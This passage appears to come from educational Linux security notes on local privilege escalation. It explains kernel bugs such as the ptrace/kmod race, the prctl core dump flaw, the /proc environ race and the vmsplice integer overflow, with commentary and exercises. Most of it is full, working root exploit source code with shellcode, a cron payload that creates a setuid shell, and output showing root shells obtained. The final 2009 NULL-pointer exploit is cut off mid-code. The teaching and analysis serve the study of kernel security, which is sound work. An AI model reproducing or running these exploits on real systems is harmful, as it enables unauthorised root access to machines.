Once one has access to some machine, it is usually possible to "get root". Physical access certainly suffices: boot from a prepared boot floppy or CD-ROM or, in case the BIOS and boot loader are password protected, open the case and short the BIOS battery (or replace the disk drive). (If even opening the case is impossible because of locks, then one did not really have physical access.)
But usually no physical action is required. Every system has flaws, and there is always some time between the moment they are discovered and the moment they are fixed.
Let us discuss a recent Linux kernel flaw, found in January and again in March 2003. The function ptrace() is used by debuggers, and allows programs like gdb to examine and change the state of a program. This function has a long history of exploits. The most recent one goes as follows.
The Linux kernel can use modules, sections of code loaded at run time: usually drivers for some hardware, or code for some type of filesystem or some network protocol. One can load such modules by hand, but when the kmod feature was enabled at compile time, the kernel will load modules automatically when they are needed. The file /proc/sys/kernel/modprobe contains the name of the module loader, a user space program that knows where in the filesystem it should look for modules.
Thus, on a kernel where kmod was not enabled:
% cat /proc/sys/kernel/modprobe
cat: /proc/sys/kernel/modprobe: No such file or directory
but on a kernel where kmod was enabled:
% cat /proc/sys/kernel/modprobe
/sbin/modprobe
(There is no real way to disable kmod, but the exploit described below will fail when one echoes /no/such/file to /proc/sys/kernel/modprobe.)
A user process can trace processes with the same user ID, but it cannot trace arbitrary processes. One will get "Permission denied" on an attempt to start tracing a setuid root program. And rightly so, for the tracer can make the tracee do anything it wants.
But now suppose some program needs a feature for which some module must be loaded. The kernel will spawn a child process /sbin/modprobe (or whatever it found in /proc/sys/kernel/modprobe), set its euid and egid to 0, and execute it.
If we can start tracing this child before euid and egid are changed, then we can insert arbitrary code into the child, let it run, and lo! we get what we want.
That is what happens in the exploit below.
/*
 * Linux kernel ptrace/kmod local root exploit
 *
 * This code exploits a race condition in kernel/kmod.c, which creates
 * kernel thread in insecure manner. This bug allows to ptrace cloned
 * process and to take control over privileged modprobe binary.
 *
 * Should work under all current 2.2.x and 2.4.x kernels.
 *
 * I discovered this stupid bug independently on January 25, 2003, that
 * is (almost) two month before it was fixed and published by Red Hat
 * and others.
 *
 * Wojciech Purczynski <cliph@isec.pl>
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
 * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
 *
 * (c) 2003 Copyright by iSEC Security Research
 *
 * Fixed off-by-one flaw, aeb.
 */

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h>

char cliphcode[] =
    "\x90\x90\xeb\x1f\xb8\xb6\x00\x00"
    "\x00\x5b\x31\xc9\x89\xca\xcd\x80"
    "\xb8\x0f\x00\x00\x00\xb9\xed\x0d"
    "\x00\x00\xcd\x80\x89\xd0\x89\xd3"
    "\x40\xcd\x80\xe8\xdc\xff\xff\xff";

#define CODE_SIZE (sizeof(cliphcode) - 1)

pid_t parent = 1;
pid_t child = 1;
pid_t victim = 1;
volatile int gotchild = 0;

void fatal(char * msg)
{
    perror(msg);
    kill(parent, SIGKILL);
    kill(child, SIGKILL);
    kill(victim, SIGKILL);
}

void putcode(unsigned long * dst)
{
    char buf[MAXPATHLEN + CODE_SIZE];
    unsigned long * src;
    int i, len;

    memcpy(buf, cliphcode, CODE_SIZE);
    len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
    if (len == -1)
        fatal("[-] Unable to read /proc/self/exe");

    len += CODE_SIZE;
    buf[len++] = '\0';

    src = (unsigned long*) buf;
    for (i = 0; i < len; i += 4)
        if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)
            fatal("[-] Unable to write shellcode");
}

void sigchld(int signo)
{
    struct user_regs_struct regs;

    if (gotchild++ == 0)
        return;

    fprintf(stderr, "[+] Signal caught\n");

    if (ptrace(PTRACE_GETREGS, victim, NULL, &regs) == -1)
        fatal("[-] Unable to read registers");

    fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);

    putcode((unsigned long *)regs.eip);

    fprintf(stderr, "[+] Now wait for suid shell...\n");

    if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)
        fatal("[-] Unable to detach from victim");

    exit(0);
}

void sigalrm(int signo)
{
    errno = ECANCELED;
    fatal("[-] Fatal error");
}

void do_child(void)
{
    int err;

    child = getpid();
    victim = child + 1;

    signal(SIGCHLD, sigchld);

    do
        err = ptrace(PTRACE_ATTACH, victim, 0, 0);
    while (err == -1 && errno == ESRCH);

    if (err == -1)
        fatal("[-] Unable to attach");

    fprintf(stderr, "[+] Attached to %d\n", victim);
    while (!gotchild) ;
    if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1)
        fatal("[-] Unable to setup syscall trace");
    fprintf(stderr, "[+] Waiting for signal\n");

    for(;;);
}

void do_parent(char * progname)
{
    struct stat st;
    int err;
    errno = 0;
    socket(AF_SECURITY, SOCK_STREAM, 1);
    do {
        err = stat(progname, &st);
    } while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);

    if (err == -1)
        fatal("[-] Unable to stat myself");

    alarm(0);
    system(progname);
}

void prepare(void)
{
    if (geteuid() == 0) {
        initgroups("root", 0);
        setgid(0);
        setuid(0);
        execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
        fatal("[-] Unable to spawn shell");
    }
}

int main(int argc, char ** argv)
{
    prepare();
    signal(SIGALRM, sigalrm);
    alarm(10);

    parent = getpid();
    child = fork();
    victim = child + 1;

    if (child == -1)
        fatal("[-] Unable to fork");

    if (child == 0)
        do_child();
    else
        do_parent(argv[0]);

    return 0;
}
Exercise
Study the above code carefully. What does this cliphcode do?
Hint: ask gdb to disassemble it. One gets
/*
 * a: syscall number
 * b, c, d: args
 * chown(path, owner, group)
 * chmod(path, mode)
 * exit(status)
 *
0x8049020 <cliphcode>:    nop
0x8049021 <cliphcode+1>:  nop
0x8049022 <cliphcode+2>:  jmp    0x8049043 <cliphcode+35>
0x8049024 <cliphcode+4>:  mov    $0xb6,%eax     / 182 = __NR_chown
0x8049029 <cliphcode+9>:  pop    %ebx           / path
0x804902a <cliphcode+10>: xor    %ecx,%ecx      / owner 0
0x804902c <cliphcode+12>: mov    %ecx,%edx      / group 0
0x804902e <cliphcode+14>: int    $0x80
0x8049030 <cliphcode+16>: mov    $0xf,%eax      / 15 = __NR_chmod
0x8049035 <cliphcode+21>: mov    $0xded,%ecx    / mode 06755
0x804903a <cliphcode+26>: int    $0x80
0x804903c <cliphcode+28>: mov    %edx,%eax
0x804903e <cliphcode+30>: mov    %edx,%ebx      / status 0
0x8049040 <cliphcode+32>: inc    %eax           / 1 = __NR_exit
0x8049041 <cliphcode+33>: int    $0x80
0x8049043 <cliphcode+35>: call   0x8049024 <cliphcode+4>
0x8049048 <cliphcode+40>:
 */
where I added the comments.
Exercise
The code above uses the proc filesystem. How should it be modified when proc is unavailable?
The peculiar call socket(AF_SECURITY, SOCK_STREAM, 1) in do_parent() uses an unimplemented address family. The kernel does not know about it, and will ask whether there is a module that knows about AF_SECURITY. This is what makes it spawn the module loader. Typically the call will look like /sbin/modprobe -s -k net-pf-14.
I found two incarnations of this exploit on the net, km3.c by Andrzej Szombierski (anszom) and isec-ptrace-kmod-exploit.c by Wojciech Purczynski (cliph), and two derived versions, myptrace.c by snooq and the heavily commented ptrace.c by Sed. Not all of these work for me. I tried the one above. After I fixed an off-by-one bug and realised that my earlier attempts had failed because I had run it on an NFS-mounted filesystem, it gave me a root shell:
[+] Attached to 11930
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
sh-2.05#
This problem was fixed in Linux 2.4.21.
Playing with core dumps is a well-known technique. The contents of the dump can be partially determined by having suitable strings in the executable or the environment. If an interpreter is friendly enough to ignore all garbage, possibly producing only some error messages, then it can be made to execute arbitrary commands. Either dump to a predetermined file, for example via a symlink, or dump in a suitable directory where all files are meaningful. Here is an example of the latter, dumping to /etc/cron.d.
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() {
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for approx. one minute (** please wait **)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
    system("/tmp/sh -i");
}
From man prctl:
PR_SET_DUMPABLE (since Linux 2.3.20)
    Set the state of the flag determining whether core dumps are produced for this process upon delivery of a signal whose default behavior is to produce a core dump. (Normally this flag is set for a process by default, but it is cleared when a set-user-ID or set-group-ID program is executed and also by various system calls that manipulate process UIDs and GIDs). In kernels up to and including 2.6.12, arg2 must be either 0 (process is not dumpable) or 1 (process is dumpable). Between kernels 2.6.13 and 2.6.17, the value 2 was also permitted, which caused any binary which normally would not be dumped to be dumped readable by root only; for security reasons, this feature has been removed. (See also the description of /proc/sys/fs/suid_dumpable in proc(5).)
So the dump, which normally would not have been permitted, occurred here and produced a core file readable by root only. This core file contains the payload string, which is part of the program's data, and cron ignores the surrounding garbage. Fortunately cron runs as root and executes the contents (every minute, but the first execution already removes the core file again).
The payload could be improved. For example, many shells drop privileges when the effective user ID differs from the real one, so a suid shell does not work. But of course this is an entirely convincing proof of concept.
A few days later there was another exploit from July 2006. It again involves PR_SET_DUMPABLE, but in an entirely different way.
/*
** Author: h00lyshit
** Vulnerable: Linux 2.6 ALL
** Type of Vulnerability: Local Race
** Tested On : various distros
** Vendor Status: unknown
**
** Disclaimer:
** In no event shall the author be liable for any damages
** whatsoever arising out of or in connection with the use
** or spread of this information.
** Any use of this information is at the user's own risk.
**
** Compile:
** gcc h00lyshit.c -o h00lyshit
**
** Usage:
** h00lyshit <very big file on the disk>
**
** Example:
** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
**
** if y0u dont have one, make big file (~100MB) in /tmp with dd
** and try to junk the cache e.g. cat /usr/lib/* >/dev/null
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <linux/a.out.h>
#include <asm/unistd.h>

static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;

/* h00lyshit shell code */
__asm__ (" __excode: call 1f \n"
         " 1: mov $23, %eax \n"
         " xor %ebx, %ebx \n"
         " int $0x80 \n"
         " pop %eax \n"
         " mov $cmd-1b, %ebx \n"
         " add %eax, %ebx \n"
         " mov $arg-1b, %ecx \n"
         " add %eax, %ecx \n"
         " mov %ebx, (%ecx) \n"
         " mov %ecx, %edx \n"
         " add $4, %edx \n"
         " mov $11, %eax \n"
         " int $0x80 \n"
         " mov $1, %eax \n"
         " int $0x80 \n"
         " arg: .quad 0x00, 0x00 \n"
         " cmd: .string \"/bin/sh\" \n"
         " __excode_e: nop \n"
         " .global __excode \n"
         " .global __excode_e \n"
        );

extern void (*__excode) (void);
extern void (*__excode_e) (void);

void
error (char *err)
{
    perror (err);
    fflush (stderr);
    exit (1);
}

/* exploit this shit */
void
exploit (char *file)
{
    int i, fd;
    void *p;
    struct stat st;

    printf ("\ntrying to exploit %s\n\n", file);
    fflush (stdout);
    chmod ("/proc/self/environ", 04755);
    c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
    memset ((void *) c, 0, 4096);

    /* slow down machine */
    fd = open (file, O_RDONLY);
    fstat (fd, &st);
    p = (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (p == MAP_FAILED)
        error ("mmap");
    prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
    sprintf (t, "/proc/%d/environ", getpid ());
    sched_yield ();
    execve (NULL, a, e);
    madvise (0, 0, MADV_WILLNEED);
    i = fork ();

    /* give it a try */
    if (i)
    {
        (*c)++;
        !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
        prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
        sched_yield ();
    }
    else
    {
        nice(10);
        while (!(*c));
        sched_yield ();
        execve (t, a, e);
        error ("failed");
    }

    waitpid (i, NULL, 0);
    exit (0);
}

int
main (int ac, char **av)
{
    int i, j, k, s;
    char *p;

    memset (e, 0, sizeof (e));
    memset (a, 0, sizeof (a));
    a[0] = strdup (av[0]);
    a[1] = strdup (av[0]);
    a[2] = strdup (av[1]);

    if (ac < 2)
        error ("usage: binary <big file name>");
    if (ac > 2)
        exploit (av[2]);
    printf ("\npreparing");
    fflush (stdout);

    /* make setuid a.out */
    memset (&ex, 0, sizeof (ex));
    N_SET_MAGIC (ex, NMAGIC);
    N_SET_MACHTYPE (ex, M_386);
    s = ((unsigned) &__excode_e) - (unsigned) &__excode;
    ex.a_text = s;
    ex.a_syms = -(s + sizeof (ex));

    memset (b, 0, sizeof (b));
    memcpy (b, &ex, sizeof (ex));
    memcpy (b + sizeof (ex), &__excode, s);

    /* make environment */
    p = b;
    s += sizeof (ex);
    j = 0;
    for (i = k = 0; i < s; i++)
    {
        if (!p[i])
        {
            e[j++] = &p[k];
            k = i + 1;
        }
    }

    /* reexec */
    getcwd (t, sizeof (t));
    strcat (t, "/");
    strcat (t, av[0]);
    execve (t, a, e);
    error ("execve");
    return 0;
}
What happens? We start with ac==2. Construct an a.out format binary in the array b[]: first the header from ex, then the code from __excode. Construct an environment that is identical to the binary. To do this, the binary is cut at its NUL bytes. NULs cannot occur inside environment strings, so each one simply becomes a string terminator. Re-exec ourselves with ac==3, and with the environment just constructed.
So far the preparation. The real work happens in exploit().
Make the file /proc/self/environ, whose contents are now the binary, setuid and executable.
Make the process non-dumpable.
Do various silly things and fork. If we are the parent, set a flag, ask to pre-read a large file (to slow the machine down), and make the process dumpable again.
If we are the child, wait for the flag, and then exec the parent's /proc/<pid>/environ as a setuid binary.
Bingo! Or not.
The kernel, in fs/proc/base.c, has code like
proc_pid_make_inode()
{
    ...
    inode->i_uid = 0;
    if (dumpable)
        inode->i_uid = task->euid;
    ...
}
If dumping core is not allowed, root is the owner of the proc files. Otherwise the effective user is the owner. The first PR_SET_DUMPABLE call inhibits core dumps, so root will be the owner.
But as long as the process is non-dumpable, ordinary reading, which is needed for the exec, will fail. The read method of /proc/.../environ is proc_pid_environ(), and it allows reading only when ptrace_may_attach() returns true. That latter function tests the dumpable flag. So the process must quickly become dumpable again, after the file's owner has been set and before its readability is checked. A race.
If we win the race, then the prepared binary is executed suid root.
More recent kernels (2.6.17 to 2.6.24.1) were vulnerable to the following exploit of mmap/vmsplice, from February 2008.
/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
    unsigned long flags;
    int count;
    int mapcount;
    unsigned long private;
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
    printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
    fflush(stdout);
    fflush(stderr);
    exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
    __asm__ __volatile__ (
    "movl %0, 0x10(%%esp) ;"
    "movl %1, 0x0c(%%esp) ;"
    "movl %2, 0x08(%%esp) ;"
    "movl %3, 0x04(%%esp) ;"
    "movl %4, 0x00(%%esp) ;"
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}

static_inline
void * get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movl %%esp, %%eax ;"
    "andl %1, %%eax ;"
    "movl (%%eax), %0"
    : "=r" (curr)
    : "i" (~8191)
    );
    return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
    __asm__ __volatile__ (
    "swapgs ;"
    "movq %0, 0x20(%%rsp) ;"
    "movq %1, 0x18(%%rsp) ;"
    "movq %2, 0x10(%%rsp) ;"
    "movq %3, 0x08(%%rsp) ;"
    "movq %4, 0x00(%%rsp) ;"
    "iretq"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}

static_inline
void * get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movq %%gs:(0), %0"
    : "=r" (curr)
    );
    return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
    long, _vmsplice,
    int, fd,
    struct iovec *, iov,
    unsigned long, nr_segs,
    unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
    int i;
    uint *p = get_current();

    for (i = 0; i < 1024-13; i++) {
        if (p[0] == uid && p[1] == uid &&
            p[2] == uid && p[3] == uid &&
            p[4] == gid && p[5] == gid &&
            p[6] == gid && p[7] == gid) {
            p[0] = p[1] = p[2] = p[3] = 0;
            p[4] = p[5] = p[6] = p[7] = 0;
            p = (uint *) ((char *)(p + 8) + sizeof(void *));
            p[0] = p[1] = p[2] = ~0;
            break;
        }
        p++;
    }

    exit_kernel();
}

void exit_code()
{
    if (getuid() != 0)
        die("wtf", 0);

    printf("[+] root\n");
    putenv("HISTFILE=/dev/null");
    execl("/bin/bash", "bash", "-i", NULL);
    die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
    int pi[2];
    size_t map_size;
    char * map_addr;
    struct iovec iov;
    struct page * pages[5];

    uid = getuid();
    gid = getgid();
    setresuid(uid, uid, uid);
    setresgid(gid, gid, gid);

    printf("-----------------------------------\n");
    printf(" Linux vmsplice Local Root Exploit\n");
    printf(" By qaaz\n");
    printf("-----------------------------------\n");

    if (!uid || !gid)
        die("!@#$", 0);

    /*****/
    pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
    pages[1] = pages[0] + 1;

    map_size = PAGE_SIZE;
    map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[0]);
    printf("[+] page: 0x%lx\n", pages[1]);

    pages[0]->flags = 1 << PG_compound;
    pages[0]->private = (unsigned long) pages[0];
    pages[0]->count = 1;
    pages[1]->lru.next = (long) kernel_code;

    /*****/
    pages[2] = *(void **) pages[0];
    pages[3] = pages[2] + 1;

    map_size = PAGE_SIZE;
    map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[2]);
    printf("[+] page: 0x%lx\n", pages[3]);

    pages[2]->flags = 1 << PG_compound;
    pages[2]->private = (unsigned long) pages[2];
    pages[2]->count = 1;
    pages[3]->lru.next = (long) kernel_code;

    /*****/
    pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[4]);

    /*****/
    map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
    map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

    /*****/
    map_size -= 2 * PAGE_SIZE;
    if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
        die("munmap", errno);

    /*****/
    if (pipe(pi) < 0) die("pipe", errno);
    close(pi[0]);

    iov.iov_base = map_addr;
    iov.iov_len = ULONG_MAX;

    signal(SIGPIPE, exit_code);
    _vmsplice(pi[1], &iov, 1, 0);
    die("vmsplice", errno);
    return 0;
}
There remains the question of what this does, and why it works.
In main() we have an array pages of pointers to struct page. We first set the following values. These are for a 32-bit machine. On a 64-bit machine, 64-bit addresses are written in pages[0] and pages[4], with 0 in one half and 4096 in the other half.
pages[0] = 0;
pages[1] = 32;
pages[2] = 16384;
pages[3] = 16416;
pages[4] = 4096;
Here 32 is sizeof(struct page), 16384 is 1<<PG_compound, and 4096 is PAGE_SIZE. pages[2] is read from the first word of the page at address 0, where pages[0]->flags = 1<<PG_compound has just been stored.
One page of memory (4096 bytes) is mapped at each of the three fixed addresses 0, 16384 and 4096. Then 50 pages of memory are mapped at some arbitrary place P (PIPE_BUFFERS is 16, and 3*16+2 = 50), and the 49th page is unmapped again. A pipe is created, and its reading end is closed. We set the signal routine that must be called when we get the SIGPIPE signal (sent for writing to a pipe without readers). Now we do vmsplice() on the writing end of the pipe.
This maps the memory area starting at P, with length ULONG_MAX, into (the writing end of) the pipe. Ha! An integer overflow bug in the kernel: it fails to see that ULONG_MAX is more than fits.
But now, what happens? Let me read the 2.6.24 code. We start with sys_vmsplice() in fs/splice.c. It calls vmsplice_to_pipe(), which calls get_iovec_page_array(), and there we find
int buffers = 0;
base = entry.iov_base;
len = entry.iov_len;
off = (unsigned long) base & ~PAGE_MASK;
npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;
if (npages > PIPE_BUFFERS - buffers)
    npages = PIPE_BUFFERS - buffers;
So off = 0 and len = -1 (that is, ULONG_MAX). Then off + len + PAGE_SIZE - 1 wraps around to PAGE_SIZE - 2, and npages = 0. The last two lines, designed to test for overflow, do not notice anything.
Now we fetch these 0 pages:
error = get_user_pages(current, current->mm, base, npages, 0, 0, &pages[buffers], NULL);
This function lives in mm/memory.c and is a big
do {
    ...
    if (!vma)
        return i ? : -EFAULT;
    ...
    pages[i] = page;
    ...
    i++;
    start += PAGE_SIZE;
    len--;
} while (len && start < vma->vm_end);
loop, where len is the npages parameter. Since that was 0, the first len-- makes it -1, and it never becomes 0 again. So this loop never finishes by completing the copy of the required number of pages. Instead it finishes when it reaches the end of the mapped area, after 48 pages, overflowing the pages[] array.
So the stack of vmsplice_to_pipe() is corrupted.
When get_user_pages() returns, get_iovec_page_array() also fills the array partial, overflowing that too:
for (i = 0; i < error; i++) {
    const int plen = min(len, PAGE_SIZE);

    partial[buffers].offset = 0;
    partial[buffers].len = plen;
    len -= plen;
    buffers++;
}
Here error is the return value of get_user_pages(), the number of user pages gotten (48), and partial is an array of structs
struct partial_page {
    unsigned int offset;
    unsigned int len;
    unsigned long private;
};
filled with a repeated (0, 4096, ?). This overflows the array partial and thereafter also the array pages:
static long vmsplice_to_pipe(struct file *file, const struct iovec __user *iov,
                             unsigned long nr_segs, unsigned int flags)
{
    struct pipe_inode_info *pipe;
    struct page *pages[PIPE_BUFFERS];
    struct partial_page partial[PIPE_BUFFERS];
    struct splice_pipe_desc spd = {
        .pages = pages,
        .partial = partial,
        .flags = flags,
        .ops = &user_page_pipe_buf_ops,
    };
    ...
    get_iovec_page_array(iov, nr_segs, pages, partial, flags & SPLICE_F_GIFT);
    ...
    return splice_to_pipe(pipe, &spd);
}
Now splice_to_pipe() is called. We read
for (;;) {
    if (!pipe->readers) {
        send_sig(SIGPIPE, current, 0);
        break;
    }
    ...
}

while (page_nr < spd_pages)
    page_cache_release(spd->pages[page_nr++]);
There are no readers since we closed the reading end, so a signal is generated. The get_user_pages() call had done follow_page(), which does a get_page(), which does atomic_inc(&page->_count).
Now a release is done for all pages involved, and the function put_page() (in mm/swap.c) is called on each.
But the page struct pointers were overwritten with 0 and 4096, so the kernel looks there, that is, in user memory instead of kernel memory. The mmap calls have prepared some memory there containing valid-looking page structs, and these have the "compound page" bit set. Consequently, the put_compound_page() routine is called:
static void put_compound_page(struct page *page)
{
    page = compound_head(page);
    if (put_page_testzero(page)) {
        compound_page_dtor *dtor;

        dtor = get_compound_page_dtor(page);
        (*dtor)(page);
    }
}
It finds the destructor routine address in the compound page struct, and calls that. Since count was set to 1, put_page_testzero() succeeds. The destructor address is taken from the lru.next field of the struct page that follows the head, which is where the exploit stored the address of kernel_code() (pages[1]->lru.next and pages[3]->lru.next). Aha.
Our routine kernel_code() is called. It finds the place in the kernel where uid and gid are stored, recognising it as four consecutive copies of our uid followed by four copies of our gid, and stores 0 there. That is why the exploit refuses to run when uid or gid is already 0: there are too many places that contain 0. The pointer current points at the current task_struct (defined in <linux/sched.h>), which has
uid_t uid,euid,suid,fsuid;
gid_t gid,egid,sgid,fsgid;
struct group_info *group_info;
kernel_cap_t cap_effective, cap_inheritable, cap_permitted;
unsigned keep_capabilities:1;
We see that the final assignments in kernel_code(), which skip the group_info pointer, give the process all capabilities. Now exit_kernel() returns to user mode in exit_code(), which starts a root shell.
% ./qaaz
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x40158000 .. 0x4018a000
[+] root
#
Yes, it works (on plain 2.6.24).
The kernel uses operations structures everywhere, so that if we have to do foo() on an object x, the kernel does x->ops->foo(). A careful programmer who prefers robust code would write
if (x->ops && x->ops->foo)
    x->ops->foo();
and indeed, this occurs all over the place in Linus' original code. That is local correctness: one sees at the call site that the pointer is non-NULL. Over time, the kernel source has moved in the direction of global correctness (only). After reading the entire kernel source one sees that x->ops->foo is never NULL, so that the test is superfluous, and one deletes the test. Of course this leads to fragile code that is difficult to maintain.
If one makes a mistake, and one always does, the direct result is a call of a function at address 0, probably followed by a kernel crash. This can be exploited as a DoS. It becomes a local root exploit if it is possible to map address 0 in user space and put suitable code there. Below is an example that works on my machine (August 2009).
First the code that starts the exploit:
#include <sys/personality.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
    if (personality(PER_SVR4) < 0) {
        perror("personality");
        return -1;
    }

    fprintf(stderr, "padlina z lublina!\n");

    execl("./exploit", "exploit", 0);
}
and then the actual exploit (for an i386):
/*
 * 14.08.2009, babcia padlina
 *
 * vulnerability discovered by google security team
 *
 * some parts of exploit code borrowed from vmsplice exploit by qaaz
 * per_svr4 mmap zero technique developed by Julien Tinnes and Tavis Ormandy:
 * http://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/
 */

#include <stdio.h>
#include <sys/socket.h>
#include <sys/user.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <inttypes.h>
#include <sys/reg.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/personality.h>

static unsigned int uid, gid;

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
#define STACK(x) (x + sizeof(x) - 40)

void exit_code();
char exit_stack[1024 * 1024];

static inline __attribute__((always_inline)) void *get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movl %%esp, %%eax ;"
    "andl %1, %%eax ;"
    "movl (%%eax), %0"
    : "=r" (curr)
